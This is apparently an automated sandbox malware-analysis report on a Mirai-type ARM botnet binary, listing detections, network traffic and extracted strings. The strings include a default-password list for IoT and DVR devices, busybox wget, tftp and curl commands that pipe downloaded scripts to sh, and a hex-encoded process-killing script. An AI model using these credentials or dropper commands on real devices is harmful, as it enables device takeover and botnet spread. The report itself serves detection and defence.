Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
la.bot.arm7.elf

Overview

General Information

Sample name:la.bot.arm7.elf
Analysis ID:1542968
MD5:d3d570ae9466f19352e9a1fafcff0b36
SHA1:17ef799f2d6bf8750c8e29c424a235737604ad0f
SHA256:79b5f34a0ee7ceda55ed85752f061e48c81a25b22d4110be281c6cc41af5fce3
Tags:elfuser-abuse_ch
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1542968
Start date and time:2024-10-27 01:37:05 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 48s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:la.bot.arm7.elf
Detection:MAL
Classification:mal52.troj.linELF@0/0@0/0
  • VT rate limit hit for: la.bot.arm7.elf
Command:/tmp/la.bot.arm7.elf
PID:6251
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
thIs wEek on xLaB lEarNs nOthinG xd
Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: la.bot.arm7.elfReversingLabs: Detection: 28%
Source: la.bot.arm7.elfString: ash|login|wget|curl|tftp|ntpdate|ftp
Source: la.bot.arm7.elfString: /proc//exe|ash|login|wget|curl|tftp|ntpdate|ftp/mountinfo/fd/dev/null|/dev/consolesocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin//proc/net/tcp/proc/fd//proc/self/exe/. /proc//dev/watchdog/dev/misc/watchdogtelnetd|udhcpc|ntpclient|boa|httpd|mini_http|watchdog|pppdM
Source: la.bot.arm7.elfString: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4t

Networking

barindex
Source: global trafficTCP traffic: 156.244.19.135 ports 2,3,4,8,9,38429
Source: global trafficTCP traffic: 192.168.2.23:44330 -> 156.244.19.135:38429
Source: /tmp/la.bot.arm7.elf (PID: 6251)Socket: 127.0.0.1:1234Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 156.244.19.135
Source: unknownTCP traffic detected without corresponding DNS query: 156.244.19.135
Source: unknownTCP traffic detected without corresponding DNS query: 156.244.19.135
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 156.244.19.135
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 156.244.19.135
Source: unknownTCP traffic detected without corresponding DNS query: 156.244.19.135
Source: unknownUDP traffic detected without corresponding DNS query: 185.84.81.194
Source: la.bot.arm7.elfString found in binary or memory: http:///curl.sh
Source: la.bot.arm7.elfString found in binary or memory: http:///wget.sh
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sampleString containing 'busybox' found: usage: busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname FICORA
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep
Source: Initial sampleString containing 'busybox' found: usage: busyboxincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > upnp
Source: Initial sampleString containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal52.troj.linELF@0/0@0/0
Source: /tmp/la.bot.arm7.elf (PID: 6251)File opened: /proc/11/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6251)File opened: /proc/22/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6251)File opened: /proc/66/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6251)File opened: /proc/99/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6251)File opened: /proc/111/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6251)File opened: /proc/222/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6251)File opened: /proc/333/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6251)File opened: /proc/777/mapsJump to behavior
Source: submitted sampleStderr: qemu: uncaught target signal 11 (Segmentation fault) - core dumped: exit code = 0
Source: /tmp/la.bot.arm7.elf (PID: 6251)Queries kernel information via 'uname': Jump to behavior
Source: la.bot.arm7.elf, 6251.1.00007ffdf7707000.00007ffdf7728000.rw-.sdmp, la.bot.arm7.elf, 6253.1.00007ffdf7707000.00007ffdf7728000.rw-.sdmp, la.bot.arm7.elf, 6263.1.00007ffdf7707000.00007ffdf7728000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/la.bot.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/la.bot.arm7.elf
Source: la.bot.arm7.elf, 6251.1.000055924f487000.000055924f5d6000.rw-.sdmp, la.bot.arm7.elf, 6253.1.000055924f487000.000055924f5d6000.rw-.sdmp, la.bot.arm7.elf, 6263.1.000055924f487000.000055924f5d6000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: la.bot.arm7.elf, 6251.1.000055924f487000.000055924f5d6000.rw-.sdmp, la.bot.arm7.elf, 6253.1.000055924f487000.000055924f5d6000.rw-.sdmp, la.bot.arm7.elf, 6263.1.000055924f487000.000055924f5d6000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: la.bot.arm7.elf, 6251.1.00007ffdf7707000.00007ffdf7728000.rw-.sdmp, la.bot.arm7.elf, 6253.1.00007ffdf7707000.00007ffdf7728000.rw-.sdmp, la.bot.arm7.elf, 6263.1.00007ffdf7707000.00007ffdf7728000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: la.bot.arm7.elf, 6253.1.00007ffdf7707000.00007ffdf7728000.rw-.sdmp, la.bot.arm7.elf, 6263.1.00007ffdf7707000.00007ffdf7728000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path InterceptionDirect Volume Access1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542968 Sample: la.bot.arm7.elf Startdate: 27/10/2024 Architecture: LINUX Score: 52 16 156.244.19.135, 38429, 44330 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 2->16 18 185.84.81.194, 44649, 5353 KAMP-DE Germany 2->18 20 3 other IPs or domains 2->20 22 Multi AV Scanner detection for submitted file 2->22 24 Connects to many ports of the same IP (likely port scanning) 2->24 8 la.bot.arm7.elf 2->8         started        signatures3 process4 process5 10 la.bot.arm7.elf 8->10         started        12 la.bot.arm7.elf 8->12         started        process6 14 la.bot.arm7.elf 10->14         started       
SourceDetectionScannerLabelLink
la.bot.arm7.elf29%ReversingLabsLinux.Trojan.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http:///wget.shla.bot.arm7.elffalse
    unknown
    http:///curl.shla.bot.arm7.elffalse
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      156.244.19.135
      unknownSeychelles
      132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      185.84.81.194
      unknownGermany
      8648KAMP-DEfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      156.244.19.135la.bot.arm7.elfGet hashmaliciousUnknownBrowse
        la.bot.sh4.elfGet hashmaliciousUnknownBrowse
          dU70DJvyQR.elfGet hashmaliciousUnknownBrowse
            109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
            • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
            185.84.81.194la.bot.arm7.elfGet hashmaliciousUnknownBrowse
              la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                dU70DJvyQR.elfGet hashmaliciousUnknownBrowse
                  na.elfGet hashmaliciousUnknownBrowse
                    na.elfGet hashmaliciousUnknownBrowse
                      na.elfGet hashmaliciousUnknownBrowse
                        na.elfGet hashmaliciousUnknownBrowse
                          MO52No4WnT.elfGet hashmaliciousUnknownBrowse
                            na.elfGet hashmaliciousUnknownBrowse
                              na.elfGet hashmaliciousUnknownBrowse
                                91.189.91.43i.elfGet hashmaliciousUnknownBrowse
                                  sshd.elfGet hashmaliciousUnknownBrowse
                                    boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                      x86.elfGet hashmaliciousUnknownBrowse
                                        arm6.elfGet hashmaliciousUnknownBrowse
                                          FBI.sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            FBI.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                nshmips.elfGet hashmaliciousUnknownBrowse
                                                  nshsh4.elfGet hashmaliciousUnknownBrowse
                                                    91.189.91.42i.elfGet hashmaliciousUnknownBrowse
                                                      sshd.elfGet hashmaliciousUnknownBrowse
                                                        boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                          x86.elfGet hashmaliciousUnknownBrowse
                                                            arm6.elfGet hashmaliciousUnknownBrowse
                                                              FBI.sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                FBI.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                    nshmips.elfGet hashmaliciousUnknownBrowse
                                                                      nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                        No context
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        KAMP-DEla.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                        • 185.84.81.194
                                                                        la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                        • 185.84.81.194
                                                                        dU70DJvyQR.elfGet hashmaliciousUnknownBrowse
                                                                        • 185.84.81.194
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 185.84.81.194
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 185.84.81.194
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 185.84.81.194
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 185.84.81.194
                                                                        MO52No4WnT.elfGet hashmaliciousUnknownBrowse
                                                                        • 185.84.81.194
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 185.84.81.194
                                                                        na.elfGet hashmaliciousMiraiBrowse
                                                                        • 185.105.253.184
                                                                        CANONICAL-ASGBi.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        sshd.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                        • 91.189.91.42
                                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        arm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        FBI.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 185.125.190.26
                                                                        FBI.sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 91.189.91.42
                                                                        FBI.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 91.189.91.42
                                                                        na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 91.189.91.42
                                                                        nshmips.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        POWERLINE-AS-APPOWERLINEDATACENTERHKkkkmpsl.elfGet hashmaliciousUnknownBrowse
                                                                        • 103.40.112.211
                                                                        la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                        • 156.244.13.91
                                                                        la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                        • 107.151.116.83
                                                                        la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                        • 156.244.13.91
                                                                        8DKuAcmAMT.elfGet hashmaliciousUnknownBrowse
                                                                        • 154.216.35.218
                                                                        garm7.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.251.7.191
                                                                        garm.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.244.234.103
                                                                        garm7.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.251.7.150
                                                                        nshppc.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.251.7.154
                                                                        garm5.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.242.206.35
                                                                        INIT7CHi.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        sshd.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                        • 109.202.202.202
                                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        arm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        FBI.sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 109.202.202.202
                                                                        FBI.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 109.202.202.202
                                                                        na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 109.202.202.202
                                                                        nshmips.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        No context
                                                                        No context
                                                                        No created / dropped files found
                                                                        File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                        Entropy (8bit):6.064150388925663
                                                                        TrID:
                                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                        File name:la.bot.arm7.elf
                                                                        File size:97'556 bytes
                                                                        MD5:d3d570ae9466f19352e9a1fafcff0b36
                                                                        SHA1:17ef799f2d6bf8750c8e29c424a235737604ad0f
                                                                        SHA256:79b5f34a0ee7ceda55ed85752f061e48c81a25b22d4110be281c6cc41af5fce3
                                                                        SHA512:09e65b12b673898c10efc8d13544678a3b85457cb50fd0c16e4100f8f0a1ad5d309a4f2b57ab4d3c1b2ff0b3b13b900106363f08106d2e3b647b653171fa7ff1
                                                                        SSDEEP:1536:B/nLUWnDA9NkU3tkrnitTwcyk8gV7Skd4XTaSUCg+DEsZkT2lvFi0MTnXCnzsT:yWnDA9NkU3tkrnoyk8gV7SkCTaSUCg+Z
                                                                        TLSH:B093F64AF8819A16C5D816BEFE0F918D336367ACE3EF7203CD14AB1537CA55B0A6B441
                                                                        File Content Preview:.ELF..............(.........4....z......4. ...(........p<u..<...<...................................Tv..Tv..............Tv..Tv..Tv.......t..............Xv..Xv..Xv..................Q.td..................................-...L..................@-.,@...0....S

                                                                        ELF header

                                                                        Class:ELF32
                                                                        Data:2's complement, little endian
                                                                        Version:1 (current)
                                                                        Machine:ARM
                                                                        Version Number:0x1
                                                                        Type:EXEC (Executable file)
                                                                        OS/ABI:UNIX - System V
                                                                        ABI Version:0
                                                                        Entry Point Address:0x8194
                                                                        Flags:0x4000002
                                                                        ELF Header Size:52
                                                                        Program Header Offset:52
                                                                        Program Header Size:32
                                                                        Number of Program Headers:5
                                                                        Section Header Offset:96956
                                                                        Section Header Size:40
                                                                        Number of Section Headers:15
                                                                        Header String Table Index:14
                                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                        NULL0x00x00x00x00x0000
                                                                        .initPROGBITS0x80d40xd40x100x00x6AX004
                                                                        .textPROGBITS0x80f00xf00x154e00x00x6AX0016
                                                                        .finiPROGBITS0x1d5d00x155d00x100x00x6AX004
                                                                        .rodataPROGBITS0x1d5e00x155e00x1f440x00x2A004
                                                                        .ARM.extabPROGBITS0x1f5240x175240x180x00x2A004
                                                                        .ARM.exidxARM_EXIDX0x1f53c0x1753c0x1180x00x82AL204
                                                                        .eh_framePROGBITS0x276540x176540x40x00x3WA004
                                                                        .tbssNOBITS0x276580x176580x80x00x403WAT004
                                                                        .init_arrayINIT_ARRAY0x276580x176580x40x00x3WA004
                                                                        .fini_arrayFINI_ARRAY0x2765c0x1765c0x40x00x3WA004
                                                                        .gotPROGBITS0x276640x176640xa80x40x3WA004
                                                                        .dataPROGBITS0x2770c0x1770c0x33c0x00x3WA004
                                                                        .bssNOBITS0x27a480x17a480x70200x00x3WA004
                                                                        .shstrtabSTRTAB0x00x17a480x730x00x0001
                                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                        EXIDX0x1753c0x1f53c0x1f53c0x1180x1184.41460x4R 0x4.ARM.exidx
                                                                        LOAD0x00x80000x80000x176540x176546.07870x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                                        LOAD0x176540x276540x276540x3f40x74144.36120x6RW 0x8000.eh_frame .tbss .init_array .fini_array .got .data .bss
                                                                        TLS0x176580x276580x276580x00x80.00000x4R 0x4.tbss
                                                                        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 27, 2024 01:37:54.636557102 CEST43928443192.168.2.2391.189.91.42
                                                                        Oct 27, 2024 01:37:55.948021889 CEST4433038429192.168.2.23156.244.19.135
                                                                        Oct 27, 2024 01:37:55.953438044 CEST3842944330156.244.19.135192.168.2.23
                                                                        Oct 27, 2024 01:37:55.953608990 CEST4433038429192.168.2.23156.244.19.135
                                                                        Oct 27, 2024 01:37:55.953803062 CEST4433038429192.168.2.23156.244.19.135
                                                                        Oct 27, 2024 01:37:55.959069967 CEST3842944330156.244.19.135192.168.2.23
                                                                        Oct 27, 2024 01:38:00.267884970 CEST42836443192.168.2.2391.189.91.43
                                                                        Oct 27, 2024 01:38:01.035628080 CEST4251680192.168.2.23109.202.202.202
                                                                        Oct 27, 2024 01:38:10.966999054 CEST4433038429192.168.2.23156.244.19.135
                                                                        Oct 27, 2024 01:38:10.972340107 CEST3842944330156.244.19.135192.168.2.23
                                                                        Oct 27, 2024 01:38:15.113759041 CEST43928443192.168.2.2391.189.91.42
                                                                        Oct 27, 2024 01:38:27.400099993 CEST42836443192.168.2.2391.189.91.43
                                                                        Oct 27, 2024 01:38:31.495620012 CEST4251680192.168.2.23109.202.202.202
                                                                        Oct 27, 2024 01:38:56.068149090 CEST43928443192.168.2.2391.189.91.42
                                                                        Oct 27, 2024 01:39:05.165873051 CEST3842944330156.244.19.135192.168.2.23
                                                                        Oct 27, 2024 01:39:05.166352034 CEST4433038429192.168.2.23156.244.19.135
                                                                        Oct 27, 2024 01:39:50.206509113 CEST4433038429192.168.2.23156.244.19.135
                                                                        Oct 27, 2024 01:39:50.212260962 CEST3842944330156.244.19.135192.168.2.23
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 27, 2024 01:37:55.230525017 CEST446495353192.168.2.23185.84.81.194
                                                                        Oct 27, 2024 01:37:55.946732044 CEST535344649185.84.81.194192.168.2.23

                                                                        System Behavior

                                                                        Start time (UTC):23:37:53
                                                                        Start date (UTC):26/10/2024
                                                                        Path:/tmp/la.bot.arm7.elf
                                                                        Arguments:/tmp/la.bot.arm7.elf
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:54
                                                                        Start date (UTC):26/10/2024
                                                                        Path:/tmp/la.bot.arm7.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:54
                                                                        Start date (UTC):26/10/2024
                                                                        Path:/tmp/la.bot.arm7.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:54
                                                                        Start date (UTC):26/10/2024
                                                                        Path:/tmp/la.bot.arm7.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1